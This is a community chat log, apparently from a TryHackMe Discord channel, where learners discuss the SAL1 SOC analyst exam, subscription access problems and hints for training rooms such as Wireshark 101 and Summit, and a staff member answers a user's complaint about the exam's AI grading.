If I purchase the SAL1 exam, does it include access to the course content needed to prepare for it? Or is the SOC Level 1 path/track the content that's specifically designed to prepare you for the SAL1 exam?

Thanks in advance for the clarification!

worldly epoch
#

when SAL1 made available i purchased it and now it is telling me i am no longer a subscriber and it logged me off my account and does not allow me to "continue with google" anymore is everything ok in the website?

quasi bough
worldly epoch
#

alright i managed to enter manually

#

im supposed to get 3 free months of premium how do i check if i still have premium?

quasi bough
worldly epoch
quasi bough
worldly epoch
#

i dont understand why i dont have 3 months of premium after the purchase

quasi bough
worldly epoch
#

its going to take me forever to get an answer from the support team now I wont be able to study at all today :/

quasi bough
worldly epoch
quasi bough
worldly epoch
quasi bough
worldly epoch
#

i know its really odd, i also got an email telling me i no longer subscribed and when i tried to enter THM it was logged off and now i cant access anything premium

#

I think i know what went wrong though

#

i had a sub approved just for 1 month

#

got the SAL1 and didnt renew the old sub

#

automated system that supposed to revoke your premuim went into action and now its kind of bugged

#

i sent a ticket to support but it does seem ill be able to study today

quasi bough
fathom swanBOT
#
TryHackMe's Email

TryHackMe's support email address.

worldly epoch
#

thank you for the help, too bad i was motivated to do a bit more today

quasi bough
tidal rampart
#

Hey, does the Learning Path tell us how to correctly submit a case report?

quasi bough
tidal rampart
wary siren
#

For the SLA1 exam portion that is multiple choice, do you get to use the THM learning path material, like SOC 1 path and Cyber 101 path from which the questions are derived? Or do I have to memorize all 4 kill chain models and every MITRE ATT&CK tactic 😂

nimble oasis
tidal rampart
left mauve
#

how do we answer wireshark 101 task 11
[9:46 PM]
Looking at the data stream what is the full request URI from packet 18?
[9:47 PM]
its not accepting the answer. scoured the net and nothing seems to be working. help

quasi bough
left mauve
#

that worked! thank you so much. i really appreciate it.

dusky maple
#

Good day. I need some help regarding how to properly answer this question in "Summit" section.

What is the second flag you receive after successfully detecting sample2.exe?

#

I feel like I'm missing something to get the answer/flag for this question. Can someone guide or assist me with this? Thanks.

dusky maple
#

I'm not getting an answer because when I try different methods of obtaining the answer...its not the right one. For example, you have to upload the Sample2.exe and check your results. With those results comes a generic message that is supposed to have malicious intent. Then, you have to use the tools to figure out what kind of malicous intent is within the Sample2.exe message. The problem is; Im not able to figure it out from that point - to actually get the flag which would advance me to the next question.

fathom swanBOT
#

I could not find an article, please try again.

dusky maple
lost olive
#

It's been awhile since I've done that room

lost olive
dusky maple
#

yeah, solving Sample2.exe is where Im stuck at....

lost olive
#

I won't directly tell you the answer, but that should give you some guidance hopefully.

dusky maple
#

Hey Verax1ty, I certainly do appreciate the help with this information you gave me. Thank you very much...I'll try that shortly after I finish reading. Thanks again!

lost olive
#

Np

lost olive
soft geyser
#

Tryhackme you failed with your fucking shit exam. Thats the worst i have ever seen in my life. No SOC except a SOC which has no idea what they are doing is working like this. I canceled my Subscription and hopefullly many other will do this.

soft geyser
#

Your AI sucks fully.

soft geyser
#

remove this exam sit down and create a better one which is competitive

proper meteor
#

Sorry this exam has not been for you. I just read some of your other posts in the other channels.

  • It seems you had an issue in the exam and reached support for help, they didn’t respond quick enough it seems. Fair point, our support team do an amazing job but we have had a lot of people sitting the exam, especially with the free exam offer and sometimes responses have slowed down responses. Generally if you them an issue you had with the exam they can offer a free retake. This is the right workflow to go through to get your issue resolved.
  • The realism of the SOC Sim part of SAL1 I think is very real to the typical day to day of a SOC L1 role. If you’re talking wider roles in a SOC like that of a L2, IR, TH etc then fair enough. However SAL1 is was designed with a SOC l1 role in mind.
  • The AI part of the exam is talked about more than its actually used. Its quite limited and even with that its used in two parts, once for grading alert reports against specific criteria per alert and one is a general recommendation to improve. The grading part is quality reviewed by humans and so far has performed very well. The recommendation part I think we can do more tuning on.
    
Sorry again you have not enjoyed the exam and its not for you.
ivory belfry
#

Good evening,

Who can I speak to about reviewing my SAL1 result?

proper meteor
ivory belfry
#

thank you

gritty lichen
#

Hello I was in the SOC simulator and got stuck one I assigned the ticket to myself and moved to the tools. I used information from the ticket to search. Now what? Is there a room I can learn the process?

gritty lichen
#

My man KGB always looking out!!! Thank you

gritty lichen